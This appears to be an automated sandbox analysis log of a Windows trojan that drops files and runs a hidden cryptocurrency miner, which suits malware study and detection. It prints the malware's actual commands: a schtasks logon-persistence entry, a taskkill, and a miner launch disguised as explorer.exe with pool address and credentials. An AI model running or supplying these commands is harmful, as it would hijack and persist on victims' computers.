Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.653385005.0000000002590000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSV vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.659039815.00000000025F1000.00000040.00000001.sdmp Binary or memory string: OriginalFilename vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.659039815.00000000025F1000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameSV vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: sistem.exe.1.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: Section: ZLIB complexity 1.00044194799
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: Section: ZLIB complexity 1.00537109375
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: Section: ZLIB complexity 1.00051229508
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: Section: ZLIB complexity 1.0107421875
Source: sistem.exe.1.dr Static PE information: Section: ZLIB complexity 1.00051229508
Source: sistem.exe.1.dr Static PE information: Section: ZLIB complexity 1.00054824561
Source: sistem.exe.1.dr Static PE information: Section: ZLIB complexity 1.0107421875
Source: sistem.exe.1.dr Static PE information: Section: .rsrc ZLIB complexity 0.995659722222
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Local\Yandex Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.mine.winEXE@39/7@2/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Virustotal: Detection: 34%
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe "C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe"
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Local\Temp\sistem.exe "C:\Users\user\AppData\Local\Temp\sistem.exe"
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Local\Temp\Microsoft.exe "C:\Users\user\AppData\Local\Temp\Microsoft.exe"
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "/sihost64
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c taskkill /f /PID "6040
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Local\Temp\sistem.exe "C:\Users\user\AppData\Local\Temp\sistem.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Local\Temp\Microsoft.exe "C:\Users\user\AppData\Local\Temp\Microsoft.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\sistem.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c taskkill /f /PID "6040 Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "/sihost64 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name=&apos;explorer.exe&apos;
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name=&apos;explorer.exe&apos;
Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 6040)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Local\Temp\sistem.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3160:120:WilError_01
Source: explorer.exe String found in binary or memory: id-cmc-addExtensions
Source: explorer.exe String found in binary or memory: set-addPolicy
Source: explorer.exe String found in binary or memory: id-cmc-addExtensions
Source: explorer.exe String found in binary or memory: set-addPolicy
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\conhost.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static file information: File size 3609088 > 1048576
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x2f2e00
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000011.00000002.821847123.00000201803A0000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026C3665 push ss; retf 0_3_026C3658
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026C36AF push ss; retf 0_3_026C3658
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BC283 push ebp; iretd 0_3_026BC2D7
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BECAF pushfd ; ret 0_3_026BECD9
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BC49B push esp; retf 0000h 0_3_026BC49C
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026C1498 push ebp; ret 0_3_026C14A0
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BD161 push edi; iretd 0_3_026BD163
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BD1D3 push cs; retf 0_3_026BD1DB
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026BF1B4 push ecx; iretd 0_3_026BF1C3
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026C4980 push ecx; retf 0_3_026C4981
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Code function: 0_3_026C2591 push edx; ret 0_3_026C259D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_05644650 push esp; iretd 1_2_0564465D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_0564460E push es; ret 1_2_05644610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_05643C58 push esp; iretd 1_2_05643C91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_05643C92 push esp; iretd 1_2_05643C91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 1_2_05645F40 push es; ret 1_2_05645F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F7D30 push eax; retn 0009h 9_2_097F7D32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F7E69 push eax; retn 0009h 9_2_097F7E6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F8110 push edx; retn 0009h 9_2_097F8112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F8091 push ecx; retn 0009h 9_2_097F8092
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F82F1 push edx; retn 0009h 9_2_097F82F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F3571 push ds; retn 0009h 9_2_097F3572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F8570 push ebx; retn 0009h 9_2_097F857A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F3541 push ds; retn 0009h 9_2_097F3542
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F3590 push ds; retn 0009h 9_2_097F3592
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 9_2_097F97D8 push ecx; ret 9_2_097F97E5
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00623B00 push rax; retf 10_2_00623B01
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00623BFF push rax; iretd 10_2_00623C01
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_006238C0 push rax; retn 0009h 10_2_006238C1
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00623AB7 push rax; retf 0009h 10_2_00623AC1
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_00409B00 push rax; retf 22_2_00409B01
PE file contains sections with non-standard names
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name:
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name: .loHdXUK
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: section name: .adata
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name:
Source: sistem.exe.1.dr Static PE information: section name: .2w140TT
Source: sistem.exe.1.dr Static PE information: section name: .adata
PE file contains an invalid checksum
Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: real checksum: 0x378b16 should be: 0x37c3ee
Source: sistem.exe.1.dr Static PE information: real checksum: 0x374485 should be: 0x363658
Source: initial sample Static PE information: section name: entropy: 7.99714150919
Source: initial sample Static PE information: section name: entropy: 7.89828462596
Source: initial sample Static PE information: section name: entropy: 7.99330469272
Source: initial sample Static PE information: section name: entropy: 7.78378163159
Source: initial sample Static PE information: section name: .rsrc entropy: 7.22431447957
Source: initial sample Static PE information: section name: .loHdXUK entropy: 7.91937517669
Source: initial sample Static PE information: section name: entropy: 7.99376649228
Source: initial sample Static PE information: section name: entropy: 7.99416148233
Source: initial sample Static PE information: section name: entropy: 7.79638828934
Source: initial sample Static PE information: section name: .rsrc entropy: 7.95896631222
Source: initial sample Static PE information: section name: .2w140TT entropy: 7.91810923308

Persistence and Installation Behavior:

barindex
Sample is not signed and drops a device driver
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to behavior
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Local\Temp\Microsoft.exe Jump to dropped file
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Local\Temp\sistem.exe Jump to dropped file
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Local\Temp\services64.exe Jump to dropped file
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Jump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"

Hooking and other Techniques for Hiding and Protection:

barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49778 -> 7777
Source: unknown Network traffic detected: HTTP traffic on port 7777 -> 49778
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 7777
Source: unknown Network traffic detected: HTTP traffic on port 7777 -> 49779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
